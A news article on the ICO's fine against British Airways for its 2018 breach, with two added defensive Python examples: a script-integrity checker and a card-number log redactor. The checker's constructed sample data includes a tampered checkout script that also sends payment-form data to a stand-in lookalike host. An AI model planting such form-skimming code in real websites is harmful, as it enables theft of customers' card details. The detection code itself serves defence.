
British Air fined $34 million for negligence in data breach, marking ICO’s biggest financial penalty in its history

British Airways plane landing in Toronto. Photo by Howard Solomon.

British Airways has been fined the equivalent of CA$34 million for a 2018 data breach that affected more than 490,000 passengers and BA employees around the world.

The Information Commissioner’s Office (ICO) announced the fine Friday, saying the failure to protect personal data under the new European General Data Protection Regulation (GDPR) was “unacceptable,” resulting in the biggest financial penalty levied by the regulator.

“People entrusted their personal details to BA and BA failed to take adequate measures to keep those details secure,” Information Commissioner Elizabeth Denham said in a statement. “Their failure to act was unacceptable and affected hundreds of thousands of people, which may have caused some anxiety and distress as a result.”

It was less than the CA$300 million proposed last year. In its decision, the ICO said the fine might have been higher had it not been for the financial impact of the COVID-19 crisis.

The attack could be considered a classic example of a third-party supply chain attack. On June 22, 2018, an unnamed attacker used the username and password of a Trinidad-based employee of BA’s cargo handler, Swissport, to access the airline’s Citrix remote access gateway and its IT system. Eventually, the attacker edited a JavaScript file on BA’s website so that passengers’ cardholder data was copied to a phony lookalike domain where it was captured.
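The modified-script stage of the attack is the kind of change a defender can catch by comparing the scripts a site actually serves against a known-good baseline and checking whether any changed file now refers to hosts outside the site’s own domains. The following is an added illustration, not code from BA, Swissport or the ICO report: the script name `checkout.js`, the two host names and the script contents are constructed sample data.

```python
import hashlib
import re

# Constructed sample: hash baseline is built from the script as originally deployed (hypothetical name)
BASELINE_SCRIPTS = {
    "checkout.js": "function submitForm(f){return sendTo('https://www.example-airline.test/pay',f)}",
}

# Constructed sample: the same script after an unauthorised edit that also posts the form to a lookalike host
CURRENT_SCRIPTS = {
    "checkout.js": ("function submitForm(f){sendTo('https://example-airline-lookalike.test/c',f);"
                    "return sendTo('https://www.example-airline.test/pay',f)}"),
}

# Hosts the site's own scripts are allowed to talk to (constructed)
ALLOWED_HOSTS = {"www.example-airline.test"}

# Matches the host part of any absolute http(s) URL embedded in script text
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def sha256_hex(data: str) -> str:
    """Hex SHA-256 of a script body; this is what the baseline stores."""
    return hashlib.sha256(data.encode("utf-8")).hexdigest()


def build_baseline(scripts: dict) -> dict:
    """Map script name -> known-good hash, taken at deployment time."""
    return {name: sha256_hex(body) for name, body in scripts.items()}


def changed_scripts(baseline_hashes: dict, current: dict) -> list:
    """Names of scripts whose current hash differs from the baseline, or that have no baseline entry."""
    return sorted(name for name, body in current.items()
                  if baseline_hashes.get(name) != sha256_hex(body))


def unexpected_hosts(body: str, allowed: set) -> list:
    """Hosts referenced by absolute URLs in the script that are not on the allow list."""
    return sorted({h.lower() for h in HOST_RE.findall(body)} - allowed)


def audit(baseline_hashes: dict, current: dict, allowed: set) -> list:
    """One finding per changed script, listing any off-site hosts it now references."""
    findings = []
    for name in changed_scripts(baseline_hashes, current):
        findings.append({"script": name, "unexpected_hosts": unexpected_hosts(current[name], allowed)})
    return findings


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_SCRIPTS)
    for finding in audit(baseline, CURRENT_SCRIPTS, ALLOWED_HOSTS):
        print(f"ALERT: {finding['script']} changed; new external hosts: {finding['unexpected_hosts']}")
```

In practice the baseline would be recorded at deployment and the current copies fetched from the live site on a schedule, so that an edit made outside the release process shows up as a hash mismatch within minutes rather than weeks. The host check is a second, independent signal: a script that changes and starts addressing a domain nobody on the team recognises is worth an immediate look even when the hash change itself has an innocent explanation.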

Among the things the commissioner considered was that it was unclear if the airline would have ever detected the breach. An unnamed third party notified BA that data was being exfiltrated and the attack stopped on September 5, 2018. The ICO also concluded that “BA was negligent in maintaining operating systems which suffered from … significant vulnerabilities and shortcomings.”

“A company the size and profile of BA is expected to be aware that it is likely to be targeted by attackers, sophisticated or otherwise. BA must be aware that the nature of its business involves processing large volumes of personal data, including sensitive personal data,” the ICO noted. “The risk of any compromise of that information may have significant consequences for BA’s customers and its own business. In view of these factors, the Commissioner would have expected BA to have taken appropriate steps or a combination of appropriate steps to secure the personal data of its customers.”

But the airline didn’t take all appropriate measures, the report concludes.

The full report details the attack but certain information is blanked out, presumably to keep potential attackers from exploiting the airline’s infrastructure. Briefly, the Swissport credential used by the attacker was one of five that had somehow been obtained. The Citrix login system allowed access to 243 applications, of which 13 weren’t protected with multi-factor authentication.

BA has a policy requiring MFA for all remote network access. The report says BA hasn’t provided a satisfactory explanation of why some applications didn’t have to comply with the MFA policy. BA’s response to a query from the ICO on this has been blacked out.

It isn’t clear how the attacker was able to break out of the Citrix environment to reach BA’s wider network. The airline has a theory, but that’s one of the blacked-out sections. However, the suggestion is that the attacker copied a number of tools into the Citrix environment.

Once out, the attacker moved through the network until they were able to get the credentials of a privileged domain administrator account whose login details were stored in plaintext. The attacker then obtained the credentials of a database system administrator and logged into several servers, presumably, says the report, looking for valuable data. What they came across were plaintext log files with payment card details for BA redemption transactions, including some CVV numbers. This was apparently test data that was supposed to be encrypted. The logging had been running automatically since 2015.

Fortunately, the report says, the file only held the previous 95 days of transactions. Unfortunately, that amounted to 108,000 payment cards.
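Card data ending up in plaintext application logs is a failure that can be engineered out at the logging layer: scrub anything that looks like a primary account number or a CVV field before a line is written. The following is an added example, not code from BA or the ICO report; the log lines, field names and card numbers are constructed sample data, and `4111111111111111` is a well-known Luhn-valid test number, not a real card.

```python
import re

# Candidate PAN: 13 to 19 digits, optionally separated by single spaces or dashes,
# not preceded or followed by another digit (so timestamps and order refs are not swallowed).
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

# CVV/CVC/CSC fields written as key=value or key: value (field names are constructed assumptions)
CVV_RE = re.compile(r"(?i)\b(cvv2?|cvc|csc)\s*[=:]\s*\d{3,4}")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum; true for every real card number, which cuts false positives on other long digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def _mask_pan(match: re.Match) -> str:
    """Keep the last four digits (enough for support staff), mask the rest."""
    raw = match.group(0)
    digits = re.sub(r"[ -]", "", raw)
    if not luhn_ok(digits):     # not a card number: leave the text alone
        return raw
    return "*" * (len(digits) - 4) + digits[-4:]


def redact_line(line: str) -> str:
    """Remove CVV values entirely and mask PANs in one log line."""
    line = CVV_RE.sub(lambda m: m.group(1) + "=[REDACTED]", line)
    return PAN_RE.sub(_mask_pan, line)


def redact_lines(lines: list) -> list:
    """Apply redact_line to every line of a log before it is persisted."""
    return [redact_line(line) for line in lines]


# Constructed sample log lines in the style of a redemption-transaction log
SAMPLE_LOG = [
    "2018-08-01 12:00:02 redemption txn=5521 card=4111 1111 1111 1111 exp=03/21 cvv=123 amount=419.00",
    "2018-08-01 12:00:03 lookup orderref=1234567890123456 status=ok",
]

if __name__ == "__main__":
    for out in redact_lines(SAMPLE_LOG):
        print(out)
```

The Luhn test is deliberate: a 16-digit order reference that fails the checksum is left intact, while a genuine PAN is masked. The CVV is removed outright rather than partially masked because there is no legitimate reason to retain any part of it after authorisation. Running this as a logging filter (or a log-shipping stage) means that even a log file captured by an intruder, as happened here, holds nothing usable.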

Ultimately the attacker was able to compromise the BA website where passengers bought tickets online and skimmed their card information.

The attacker could have accessed information on 490,000 individuals, including the names, addresses, card numbers and CVV numbers of 244,000 people; 77,000 card and CVV numbers; 108,000 card numbers only; usernames and passwords of BA employees; and usernames and PINs of 612 BA Executive Club accounts.
